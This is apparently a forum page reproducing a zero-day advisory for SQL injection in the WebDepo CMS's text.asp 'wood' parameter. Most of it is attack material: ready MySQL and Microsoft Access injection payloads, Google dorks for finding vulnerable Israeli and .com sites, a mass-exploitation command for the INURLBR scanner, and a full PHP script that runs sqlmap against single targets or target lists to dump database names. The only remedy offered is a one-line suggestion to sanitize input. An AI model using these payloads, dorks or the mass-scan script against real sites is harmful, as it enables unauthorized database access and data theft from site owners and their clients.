Search the Community
Showing results for tags 'webdepo'.
-
Advisory: SQLi-vulnerabilities in aplication CMS WebDepo Affected aplication web: Aplication CMS WebDepo (Release date: 28/03/2014) Vendor URL: http://www.webdepot.co.il Vendor Status: 0day ========================== Vulnerability Description: ========================== Records and client practice management application CMS WebDepo suffers from multiple SQL injection vulnerabilitie ========================== Technical Details: ========================== SQL can be injected in the following GET GET VULN: wood=(id) $wood=intval($_REQUEST['wood']) ========================== SQL injection vulnerabilities ========================== Injection is possible through the file text.asp Exploit-Example: DBMS: 'MySQL' Exploit: +AND+(SELECT 8880 FROM(SELECT COUNT(*),CONCAT(0x496e75726c42726173696c,0x3a3a,version(),(SELECT (CASE WHEN (8880=8880) THEN 1 ELSE 0 END)),0x717a727a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) DBMS: 'Microsoft Access' Exploit: +UNION+ALL+SELECT+NULL,NULL,NULL,CHR(113)&CHR(112)&CHR(120)&CHR(112)&CHR(113)&CHR(85)&CHR(116)&CHR(106)&CHR(110)&CHR(108)&CHR(90)&CHR(74)&CHR(113)&CHR(88)&CHR(116)&CHR(113)&CHR(118)&CHR(111)&CHR(100)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16 Ex: http://target.us/text.asp?wood=(id)+Exploit ========================== SCRIPT EXPLOIT ========================== http://pastebin.com/b6bWuw7k --help: -t : SET TARGET. -f : SET FILE TARGETS. -p : SET PROXY Execute: php WebDepoxpl.php -t target php WebDepoxpl.php -f targets.txt php WebDepoxpl.php -t target -p 'http://localhost:9090' howto: http://blog.inurl.com.br/2015/03/0day-webdepo-sql-injection.html ========================== GOOGLE DORK ========================== inurl:"text.asp?wood=" site:il inurl:"text.asp?wood=" site:com inurl:"text.asp?wood=" ========================== Solution: ========================== Sanitizing all requests coming from the client ========================== Credits: ========================== AUTOR: Cleiton Pinheiro / Nick: googleINURL Blog: http://blog.inurl.com.br Twitter: https://twitter.com/googleinurl Fanpage: https://fb.com/InurlBrasil Pastebin http://pastebin.com/u/Googleinurl GIT: https://github.com/googleinurl PSS: http://packetstormsecurity.com/user/googleinurl YOUTUBE: http://youtube.com/c/INURLBrasil PLUS: http://google.com/+INURLBrasil ========================== References: ========================== [1] http://blog.inurl.com.br/2015/03/0day-webdepo-sql-injection.html [2] https://msdn.microsoft.com/en-us/library/ff648339.aspx Exploit: <?php /* # AUTOR: Cleiton Pinheiro / Nick: googleINURL # Blog: http://blog.inurl.com.br # Twitter: https://twitter.com/googleinurl # Fanpage: https://fb.com/InurlBrasil # Pastebin http://pastebin.com/u/Googleinurl # GIT: https://github.com/googleinurl # PSS: http://packetstormsecurity.com/user/googleinurl # YOUTUBE: http://youtube.com/c/INURLBrasil # PLUS: http://google.com/+INURLBrasil # EXPLOIT NAME: MINI exploit-SQLMAP - (0DAY) WebDepo -SQL injection / INURL BRASIL # VENTOR: http://www.webdepot.co.il # GET VULN: wood=(id) # $wood=intval($_REQUEST['wood']) ----------------------------------------------------------------------------- # DBMS: 'MySQL' # Exploit: +AND+(SELECT 8880 FROM(SELECT COUNT(*),CONCAT(0x496e75726c42726173696c,0x3a3a,version(),(SELECT (CASE WHEN (8880=8880) THEN 1 ELSE 0 END)),0x717a727a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) # DBMS: 'Microsoft Access' # Exploit: +UNION+ALL+SELECT+NULL,NULL,NULL,CHR(113)&CHR(112)&CHR(120)&CHR(112)&CHR(113)&CHR(85)&CHR(116)&CHR(106)&CHR(110)&CHR(108)&CHR(90)&CHR(74)&CHR(113)&CHR(88)&CHR(116)&CHR(113)&CHR(118)&CHR(111)&CHR(100)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16 ----------------------------------------------------------------------------- # http://target.us/text.asp?wood=(id)+Exploit # GOOGLE DORK: inurl:"text.asp?wood=" # GOOGLE DORK: site:il inurl:"text.asp?wood=" # GOOGLE DORK: site:com inurl:"text.asp?wood=" # --help: -t : SET TARGET. -f : SET FILE TARGETS. -p : SET PROXY Execute: php WebDepoxpl.php -t target php WebDepoxpl.php -f targets.txt php WebDepoxpl.php -t target -p 'http://localhost:9090' ----------------------------------------------------------------------------- # EXPLOIT MASS USE SCANNER INURLBR # COMMAND: ./inurlbr.php --dork 'site:il inurl:text.asp?wood= ' -s 0dayWebDepo.txt -q 1,6 --exploit-get "?´'0x27" --comand-all "php 0dayWebDepo.php -t '_TARGET_'" # DOWNLOAD INURLBR: https://github.com/googleinurl/SCANNER-INURLBR ----------------------------------------------------------------------------- # TUTORIAL: http://blog.inurl.com.br/2015/03/0day-webdepo-sql-injection.html */ error_reporting(1); set_time_limit(0); ini_set('display_errors', 1); ini_set('max_execution_time', 0); ini_set('allow_url_fopen', 1); ob_implicit_flush(true); ob_end_flush(); $folder_SqlMap = "python ../sqlmap/sqlmap.py"; $op_ = getopt('f:t:p:', array('help::')); echo " _____ (_____) ____ _ _ _ _ _____ _ ____ _ _ (() ()) |_ _| \ | | | | | __ \| | | _ \ (_) | \ / | | | \| | | | | |__) | | ______ | |_) |_ __ __ _ ___ _| | \ / | | | . ` | | | | _ /| | |______| | _ <| '__/ _` / __| | | /=\ _| |_| |\ | |__| | | \ \| |____ | |_) | | | (_| \__ \ | | [___] |_____|_| \_|\____/|_| \_\______| |____/|_| \__,_|___/_|_| \n\033[1;37m0xNeither war between hackers, nor peace for the system.\n [+] [Exploit]: MINI 3xplo1t-SqlMap - (0DAY) WebDepo -SQL injection / INURL BRASIL\nhelp: --help\033[0m\n\n"; $menu = " -t : SET TARGET. -f : SET FILE TARGETS. -p : SET PROXY Execute: php 0dayWebDepo.php -t target php 0dayWebDepo.php -f targets.txt php 0dayWebDepo.php -t target -p 'http://localhost:9090' \n"; echo isset($op_['help']) ? exit($menu) : NULL; $params = array( 'target' => not_isnull_empty($op_['t']) ? (strstr($op_['t'], 'http') ? $op_['t'] : "http://{$op_['t']}") : NULL, 'file' => !not_isnull_empty($op_['t']) && not_isnull_empty($op_['f']) ? $op_['f'] : NULL, 'proxy' => not_isnull_empty($op_['p']) ? "--proxy '{$op_['p']}'" : NULL, 'folder' => $folder_SqlMap, 'line' => "-----------------------------------------------------------------------------------" ); not_isnull_empty($params['target']) && not_isnull_empty($params['file']) ? exit("[X] [ERRO] DEFINE TARGET OR FILE TARGET\n") : NULL; not_isnull_empty($params['target']) ? __exec($params) . exit() : NULL; not_isnull_empty($params['file']) ? __listTarget($params) . exit() : NULL; function not_isnull_empty($valor = NULL) { RETURN !is_null($valor) && !empty($valor) ? TRUE : FALSE; } function __plus() { ob_flush(); flush(); } function __listTarget($file) { $tgt_ = array_unique(array_filter(explode("\n", file_get_contents($file['file'])))); echo "\n\033[1;37m[!] [" . date("H:i:s") . "] [INFO] TOTAL TARGETS LOADED : " . count($tgt_) . "\033[0m\n"; foreach ($tgt_ as $url) { echo "\033[1;37m[+] [" . date("H:i:s") . "] [INFO] SCANNING : {$url} \033[0m\n"; __plus(); $file['target'] = $url; __exec($file) . __plus(); } } function __exec($params) { __plus(); echo "\033[1;37m{$params['line']}\n[!] [" . date("H:i:s") . "] [INFO] starting SqlMap...\n"; echo "[+] [" . date("H:i:s") . "] [INFO] TARGET: {$params['target']}/text.asp?wood={SQL-INJECTION}\033[0m\n"; $command = "python ../sqlmap/sqlmap.py -u '{$params['target']}/text.asp?wood=1' -p wood --batch --dbms=MySQL {$params['proxy']} --random-agent --answers='follow=N' --dbs --level 2"; system($command, $dados) . empty($dados[0]) ? exit() : NULL; __plus(); } Source